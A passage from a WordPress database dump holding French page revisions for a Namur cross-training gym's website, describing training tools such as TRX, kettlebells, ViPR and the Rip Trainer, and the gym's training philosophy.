puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2><b>ViPR</b></h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2><b>RIP TRAINER</b></h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 08:02:41', '2013-06-16 08:02:41', '', 22, 'http://www.crosstrainingcenter.be/?p=40', 0, 'revision', '', 0),
(33, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', 'définition, historique', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 22, 'http://www.crosstrainingcenter.be/?p=33', 0, 'revision', '', 0),
(34, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 5, 'http://www.crosstrainingcenter.be/?p=34', 0, 'revision', '', 0),
(103, 1, '2013-06-16 13:57:21', '2013-06-16 13:57:21', '', 'picto2', '', 'inherit', 'open', 'open', '', 'picto2', '', '', '2013-06-16 13:57:21', '2013-06-16 13:57:21', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png', 0, 'attachment', 'image/png', 0),
(42, 1, '2013-06-13 16:26:32', '2013-06-13 16:26:32', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b>PREVENIR</b> – <b>AMELIORER</b> – <b>RECUPERER</b>.</p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-13 16:26:32', '2013-06-13 16:26:32', '', 5, 'http://www.crosstrainingcenter.be/?p=42', 0, 'revision', '', 0),
(53, 1, '2013-06-16 10:24:38', '2013-06-16 10:24:38', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:24:38', '2013-06-16 10:24:38', '', 5, 'http://www.crosstrainingcenter.be/?p=53', 0, 'revision', '', 0),
(44, 1, '2013-06-16 08:20:16', '2013-06-16 08:20:16', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-41\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a></b></p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 08:20:16', '2013-06-16 08:20:16', '', 5, 'http://www.crosstrainingcenter.be/?p=44', 0, 'revision', '', 0),
(46, 1, '2013-06-16 10:02:09', '2013-06-16 10:02:09', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-43\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n<p align=\"center\"></p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:02:09', '2013-06-16 10:02:09', '', 5, 'http://www.crosstrainingcenter.be/?p=46', 0, 'revision', '', 0),
(48, 1, '2013-06-16 10:05:33', '2013-06-16 10:05:33', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:05:33', '2013-06-16 10:05:33', '', 5, 'http://www.crosstrainingcenter.be/?p=48', 0, 'revision', '', 0),
(50, 1, '2013-06-16 10:09:07', '2013-06-16 10:09:07', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:09:07', '2013-06-16 10:09:07', '', 5, 'http://www.crosstrainingcenter.be/?p=50', 0, 'revision', '', 0),
(51, 1, '2013-06-16 10:14:10', '2013-06-16 10:14:10', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:14:10', '2013-06-16 10:14:10', '', 5, 'http://www.crosstrainingcenter.be/?p=51', 0, 'revision', '', 0),
(54, 1, '2013-06-16 08:04:06', '2013-06-16 08:04:06', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 08:04:06', '2013-06-16 08:04:06', '', 22, 'http://www.crosstrainingcenter.be/?p=54', 0, 'revision', '', 0),
(55, 1, '2013-06-16 10:42:17', '2013-06-16 10:42:17', '<blockquote>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:42:17', '2013-06-16 10:42:17', '', 22, 'http://www.crosstrainingcenter.be/?p=55', 0, 'revision', '', 0),
(56, 1, '2013-06-16 10:43:00', '2013-06-16 10:43:00', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:43:00', '2013-06-16 10:43:00', '', 22, 'http://www.crosstrainingcenter.be/?p=56', 0, 'revision', '', 0),
(57, 1, '2013-06-16 10:44:43', '2013-06-16 10:44:43', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et 